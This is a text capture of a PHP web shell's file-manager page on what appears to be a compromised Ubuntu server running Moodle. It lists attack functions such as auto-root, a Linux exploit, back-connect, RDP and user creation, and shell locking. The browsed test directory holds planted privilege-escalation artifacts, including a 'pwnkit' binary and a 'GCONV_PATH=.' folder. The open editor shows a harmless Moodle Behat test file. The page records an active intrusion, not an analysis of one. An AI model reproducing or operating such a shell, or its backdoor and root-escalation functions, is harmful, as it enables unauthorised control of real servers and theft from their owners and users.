Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
add_blocks.feature
931
B
-rwxrwxrwx
behat_blocks.php
6.21
KB
-rwxrwxrwx
configure_block_throughout_sit...
3.06
KB
-rwxrwxrwx
hidden_block_region.feature
2.39
KB
-rwxrwxrwx
hide_blocks.feature
1.27
KB
-rwxrwxrwx
manage_blocks.feature
2.22
KB
-rwxrwxrwx
move_blocks.feature
1.73
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
restrict_available_blocks.feat...
1.7
KB
-rwxrwxrwx
return_block_original_state.fe...
1.98
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hide_blocks.feature
@core @core_block Feature: Block visibility In order to configure blocks visibility As a teacher I need to show and hide blocks on a page Background: Given the following "courses" exist: | fullname | shortname | category | | Course 1 | C1 | 0 | And the following "blocks" exist: | blockname | contextlevel | reference | pagetypepattern | defaultregion | | search_forums | Course | C1 | course-view-* | side-pre | And I log in as "admin" And I am on "Course 1" course homepage with editing mode on @javascript Scenario: Hiding all blocks on the page should remove the column they're in When I open the "Search forums" blocks action menu And I click on "Configure Search forums block" "link" in the "Search forums" "block" And I set the field "Region" to "Right" And I press "Save changes" And I turn editing mode off Then ".empty-region-side-post" "css_element" should not exist in the "body" "css_element" And I turn editing mode on And I open the "Search forums" blocks action menu And I click on "Hide Search forums block" "link" in the "Search forums" "block" And I follow "Turn editing off" And ".empty-region-side-post" "css_element" should exist in the "body" "css_element"
Close